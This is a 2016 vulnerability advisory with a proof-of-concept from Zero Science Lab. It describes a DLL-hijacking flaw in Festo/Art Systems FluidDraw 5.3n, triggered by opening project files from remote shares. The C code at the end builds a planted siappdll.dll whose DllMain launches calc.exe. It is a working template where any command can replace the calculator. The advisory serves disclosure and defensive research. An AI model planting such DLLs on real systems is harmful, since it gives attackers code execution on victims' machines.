Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution

<html><body><p>/*


Art Systems FluidDraw P5/S5 5.3n Binary Planting Arbitrary Code Execution


Vendor: Art Systems Software GmbH | Festo AG &amp; Co. KG
Product web page: http://www.art-systems.com | https://www.festo.com
Affected version: FluidDraw S5 Starter 5.3n (5.3.385.0)
                  FluidDraw P5 Professional 5.3n (5.3.385.0)

Summary: Fluiddraw enables the creation of electrical and pneumatic
circuit diagrams. The tool makes it easier to plan complete systems
and implement individual components. Users access the Festo catalogue
and their own imported databases and can thus benefit from evaluation
functions and created assembly drawings. The software is part of Festo
Engineering Tools, which provides users with electronic and continuous
support in the entire process, from planning, selection, design and
ordering up to delivery and commissioning.

Desc: FluidDraw suffers from a DLL Hijacking issue. The vulnerability
is caused due to the application loading libraries (siappdll.dll) in
an insecure manner. This can be exploited to load arbitrary libraries
by tricking a user into opening a related application files (.PRJ, .CIRC,
.CT, .DXF, .SYM) located on a remote WebDAV or SMB share.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5295
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5295.php


01.12.2015

*/


// gcc -shared -o siappdll.dll exploit.c

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{ 
	exec();
	return 0;
}

int exec()
{
	WinExec( "calc.exe" , SW_NORMAL );
	return 0;
}
</windows.h></p></body></html>